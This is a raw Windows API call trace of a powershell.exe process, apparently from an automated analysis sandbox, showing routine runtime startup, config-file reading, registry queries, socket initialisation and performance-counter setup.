	[0114.377] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.379] VirtualQuery (in: lpAddress=0x1c7edc60, lpBuffer=0x1c7eeb20, dwLength=0x30 | out: lpBuffer=0x1c7eeb20*(BaseAddress=0x1c7ed000, AllocationBase=0x1be60000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.384] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.384] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.387] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.387] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.388] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.391] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.391] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.391] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.522] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.522] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.522] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.525] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.525] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.526] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.527] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.527] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.528] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.533] VirtualQuery (in: lpAddress=0x1c7edf10, lpBuffer=0x1c7eedd0, dwLength=0x30 | out: lpBuffer=0x1c7eedd0*(BaseAddress=0x1c7ed000, AllocationBase=0x1be60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0114.534] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.535] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.535] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.538] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.538] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.538] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.539] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.539] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.541] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.541] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.546] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.546] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.546] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.673] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.673] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.673] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.675] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.675] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.684] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.684] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.684] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.686] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.687] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.687] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.688] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.688] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.688] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.690] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.690] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.690] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.692] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.692] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.712] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.712] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.816] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.816] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.821] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.822] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.826] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.826] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.826] CoTaskMemFree (pv=0x1b8474f0) 
	[0114.830] CoTaskMemAlloc (cb=0x104) returned 0x1b8474f0
	[0114.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8474f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0114.830] CoTaskMemFree (pv=0x1b8474f0) 
	[0115.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c7ed8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0115.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c7ed7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0115.914] CoTaskMemAlloc (cb=0x20c) returned 0x1b8460d0
	[0115.915] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b8460d0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0115.915] CoTaskMemFree (pv=0x1b8460d0) 
	[0115.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7ed940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0116.109] GetCurrentProcess () returned 0xffffffffffffffff
	[0116.109] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7ed8a8 | out: TokenHandle=0x1c7ed8a8*=0x33c) returned 1
	[0116.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c7ed500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0116.153] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c7ed950 | out: lpFileInformation=0x1c7ed950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0116.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c7ed4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0116.155] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c7ed900 | out: lpFileInformation=0x1c7ed900*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0116.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c7ed2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0116.156] SetErrorMode (uMode=0x1) returned 0x1
	[0116.156] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x344
	[0116.156] GetFileType (hFile=0x344) returned 0x1
	[0116.156] SetErrorMode (uMode=0x1) returned 0x1
	[0116.157] GetFileType (hFile=0x344) returned 0x1
	[0116.159] GetFileSize (in: hFile=0x344, lpFileSizeHigh=0x1c7ed8f8 | out: lpFileSizeHigh=0x1c7ed8f8*=0x0) returned 0x622a
	[0116.160] ReadFile (in: hFile=0x344, lpBuffer=0x30b61e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7ed818, lpOverlapped=0x0 | out: lpBuffer=0x30b61e8*, lpNumberOfBytesRead=0x1c7ed818*=0x1000, lpOverlapped=0x0) returned 1
	[0116.543] ReadFile (in: hFile=0x344, lpBuffer=0x30b61e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7ed348, lpOverlapped=0x0 | out: lpBuffer=0x30b61e8*, lpNumberOfBytesRead=0x1c7ed348*=0x1000, lpOverlapped=0x0) returned 1
	[0117.048] ReadFile (in: hFile=0x344, lpBuffer=0x2f5fc98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7ed348, lpOverlapped=0x0 | out: lpBuffer=0x2f5fc98*, lpNumberOfBytesRead=0x1c7ed348*=0x1000, lpOverlapped=0x0) returned 1
	[0117.048] ReadFile (in: hFile=0x344, lpBuffer=0x2f5fc98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7ed348, lpOverlapped=0x0 | out: lpBuffer=0x2f5fc98*, lpNumberOfBytesRead=0x1c7ed348*=0x1000, lpOverlapped=0x0) returned 1
	[0117.048] ReadFile (in: hFile=0x344, lpBuffer=0x2f5fc98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7ed348, lpOverlapped=0x0 | out: lpBuffer=0x2f5fc98*, lpNumberOfBytesRead=0x1c7ed348*=0x1000, lpOverlapped=0x0) returned 1
	[0117.055] ReadFile (in: hFile=0x344, lpBuffer=0x2f5fc98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7ed488, lpOverlapped=0x0 | out: lpBuffer=0x2f5fc98*, lpNumberOfBytesRead=0x1c7ed488*=0x1000, lpOverlapped=0x0) returned 1
	[0117.056] ReadFile (in: hFile=0x344, lpBuffer=0x2f5fc98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7ed308, lpOverlapped=0x0 | out: lpBuffer=0x2f5fc98*, lpNumberOfBytesRead=0x1c7ed308*=0x22a, lpOverlapped=0x0) returned 1
	[0117.056] ReadFile (in: hFile=0x344, lpBuffer=0x2f5fc98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7ed3a8, lpOverlapped=0x0 | out: lpBuffer=0x2f5fc98*, lpNumberOfBytesRead=0x1c7ed3a8*=0x0, lpOverlapped=0x0) returned 1
	[0117.056] CloseHandle (hObject=0x344) returned 1
	[0117.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c7ed8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0117.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c7ed7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0117.058] CoTaskMemAlloc (cb=0x20c) returned 0x1b8460d0
	[0117.058] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b8460d0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0117.058] CoTaskMemFree (pv=0x1b8460d0) 
	[0117.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7ed930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0117.058] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.058] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7edb08 | out: TokenHandle=0x1c7edb08*=0x344) returned 1
	[0117.059] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.059] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7edb08 | out: TokenHandle=0x1c7edb08*=0x330) returned 1
	[0117.061] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.062] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7ed8a8 | out: TokenHandle=0x1c7ed8a8*=0x340) returned 1
	[0117.062] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c7ed950 | out: lpFileInformation=0x1c7ed950*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0117.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c7ed4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0117.096] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c7ed900 | out: lpFileInformation=0x1c7ed900*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0117.096] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.096] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7edb08 | out: TokenHandle=0x1c7edb08*=0x348) returned 1
	[0117.097] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.097] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7edb08 | out: TokenHandle=0x1c7edb08*=0x34c) returned 1
	[0117.119] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.119] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7ed788 | out: TokenHandle=0x1c7ed788*=0x3ac) returned 1
	[0117.175] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.175] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7ed788 | out: TokenHandle=0x1c7ed788*=0x35c) returned 1
	[0117.187] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x360
	[0117.187] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x364
	[0117.200] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.200] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7ed758 | out: TokenHandle=0x1c7ed758*=0x368) returned 1
	[0117.222] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.222] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7ed758 | out: TokenHandle=0x1c7ed758*=0x36c) returned 1
	[0117.490] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.490] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7ed698 | out: TokenHandle=0x1c7ed698*=0x370) returned 1
	[0117.498] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.498] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7ed698 | out: TokenHandle=0x1c7ed698*=0x374) returned 1
	[0117.537] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.538] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7edcd8 | out: TokenHandle=0x1c7edcd8*=0x378) returned 1
	[0117.601] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7ebd98 | out: phkResult=0x1c7ebd98*=0x3b0) returned 0x0
	[0117.601] RegQueryValueExW (in: hKey=0x3b0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c7ebd1c, lpData=0x0, lpcbData=0x1c7ebd18*=0x0 | out: lpType=0x1c7ebd1c*=0x1, lpData=0x0, lpcbData=0x1c7ebd18*=0xe) returned 0x0
	[0117.601] CoTaskMemAlloc (cb=0x12) returned 0x1b87c260
	[0117.601] RegQueryValueExW (in: hKey=0x3b0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c7ebcec, lpData=0x1b87c260, lpcbData=0x1c7ebce8*=0xe | out: lpType=0x1c7ebcec*=0x1, lpData="Client", lpcbData=0x1c7ebce8*=0xe) returned 0x0
	[0117.602] CoTaskMemFree (pv=0x1b87c260) 
	[0117.602] RegCloseKey (hKey=0x3b0) returned 0x0
	[0117.648] CoTaskMemAlloc (cb=0xcd0) returned 0x1b87e3d0
	[0117.673] RasEnumConnectionsW (in: param_1=0x1b87e3d0, param_2=0x1c7edd2c, param_3=0x1c7edd28 | out: param_1=0x1b87e3d0, param_2=0x1c7edd2c, param_3=0x1c7edd28) returned 0x0
	[0117.677] CoTaskMemFree (pv=0x1b87e3d0) 
	[0117.881] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c7edb38 | out: lpWSAData=0x1c7edb38) returned 0
	[0117.890] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x404
	[0117.894] setsockopt (s=0x404, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0117.894] closesocket (s=0x404) returned 0
	[0117.894] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x404
	[0117.896] setsockopt (s=0x404, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0117.896] closesocket (s=0x404) returned 0
	[0117.902] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.902] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7ed3b8 | out: TokenHandle=0x1c7ed3b8*=0x404) returned 1
	[0117.916] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.917] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7ed3b8 | out: TokenHandle=0x1c7ed3b8*=0x408) returned 1
	[0117.987] GetCurrentProcessId () returned 0x7cc
	[0118.029] CoTaskMemAlloc (cb=0x204) returned 0x1d0150
	[0118.029] GetComputerNameW (in: lpBuffer=0x1d0150, nSize=0x2f8e248 | out: lpBuffer="XDUWTFONO", nSize=0x2f8e248) returned 1
	[0118.029] CoTaskMemFree (pv=0x1d0150) 
	[0118.032] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7ed898 | out: phkResult=0x1c7ed898*=0x40c) returned 0x0
	[0118.032] RegQueryValueExW (in: hKey=0x40c, lpValueName="Library", lpReserved=0x0, lpType=0x1c7ed81c, lpData=0x0, lpcbData=0x1c7ed818*=0x0 | out: lpType=0x1c7ed81c*=0x1, lpData=0x0, lpcbData=0x1c7ed818*=0x1c) returned 0x0
	[0118.032] CoTaskMemAlloc (cb=0x20) returned 0x1b87f3e0
	[0118.032] RegQueryValueExW (in: hKey=0x40c, lpValueName="Library", lpReserved=0x0, lpType=0x1c7ed7ec, lpData=0x1b87f3e0, lpcbData=0x1c7ed7e8*=0x1c | out: lpType=0x1c7ed7ec*=0x1, lpData="netfxperf.dll", lpcbData=0x1c7ed7e8*=0x1c) returned 0x0
	[0118.032] CoTaskMemFree (pv=0x1b87f3e0) 
	[0118.032] RegQueryValueExW (in: hKey=0x40c, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c7ed81c, lpData=0x0, lpcbData=0x1c7ed818*=0x0 | out: lpType=0x1c7ed81c*=0x4, lpData=0x0, lpcbData=0x1c7ed818*=0x4) returned 0x0
	[0118.033] RegQueryValueExW (in: hKey=0x40c, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c7ed820, lpData=0x1c7ed81c, lpcbData=0x1c7ed818*=0x4 | out: lpType=0x1c7ed820*=0x4, lpData=0x1c7ed81c*=0x1, lpcbData=0x1c7ed818*=0x4) returned 0x0
	[0118.033] RegQueryValueExW (in: hKey=0x40c, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c7ed81c, lpData=0x0, lpcbData=0x1c7ed818*=0x0 | out: lpType=0x1c7ed81c*=0x4, lpData=0x0, lpcbData=0x1c7ed818*=0x4) returned 0x0
	[0118.033] RegQueryValueExW (in: hKey=0x40c, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c7ed820, lpData=0x1c7ed81c, lpcbData=0x1c7ed818*=0x4 | out: lpType=0x1c7ed820*=0x4, lpData=0x1c7ed81c*=0x137a, lpcbData=0x1c7ed818*=0x4) returned 0x0
	[0118.033] RegCloseKey (hKey=0x40c) returned 0x0
	[0118.056] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7ed858 | out: phkResult=0x1c7ed858*=0x40c) returned 0x0
	[0118.056] RegQueryValueExW (in: hKey=0x40c, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c7ed7dc, lpData=0x0, lpcbData=0x1c7ed7d8*=0x0 | out: lpType=0x1c7ed7dc*=0x4, lpData=0x0, lpcbData=0x1c7ed7d8*=0x4) returned 0x0
	[0118.056] RegQueryValueExW (in: hKey=0x40c, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c7ed7e0, lpData=0x1c7ed7dc, lpcbData=0x1c7ed7d8*=0x4 | out: lpType=0x1c7ed7e0*=0x4, lpData=0x1c7ed7dc*=0x3, lpcbData=0x1c7ed7d8*=0x4) returned 0x0
	[0118.056] RegQueryValueExW (in: hKey=0x40c, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c7ed7dc, lpData=0x0, lpcbData=0x1c7ed7d8*=0x0 | out: lpType=0x1c7ed7dc*=0x4, lpData=0x0, lpcbData=0x1c7ed7d8*=0x4) returned 0x0
	[0118.057] RegQueryValueExW (in: hKey=0x40c, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c7ed7e0, lpData=0x1c7ed7dc, lpcbData=0x1c7ed7d8*=0x4 | out: lpType=0x1c7ed7e0*=0x4, lpData=0x1c7ed7dc*=0x20000, lpcbData=0x1c7ed7d8*=0x4) returned 0x0
	[0118.057] RegQueryValueExW (in: hKey=0x40c, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c7ed7dc, lpData=0x0, lpcbData=0x1c7ed7d8*=0x0 | out: lpType=0x1c7ed7dc*=0x3, lpData=0x0, lpcbData=0x1c7ed7d8*=0xaa) returned 0x0
	[0118.057] RegQueryValueExW (in: hKey=0x40c, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c7ed7dc, lpData=0x2f91538, lpcbData=0x1c7ed7d8*=0xaa | out: lpType=0x1c7ed7dc*=0x3, lpData=0x2f91538*, lpcbData=0x1c7ed7d8*=0xaa) returned 0x0
	[0118.061] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0118.110] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c7ed790, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x410
	[0118.112] MapViewOfFile (hFileMappingObject=0x410, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2b20000
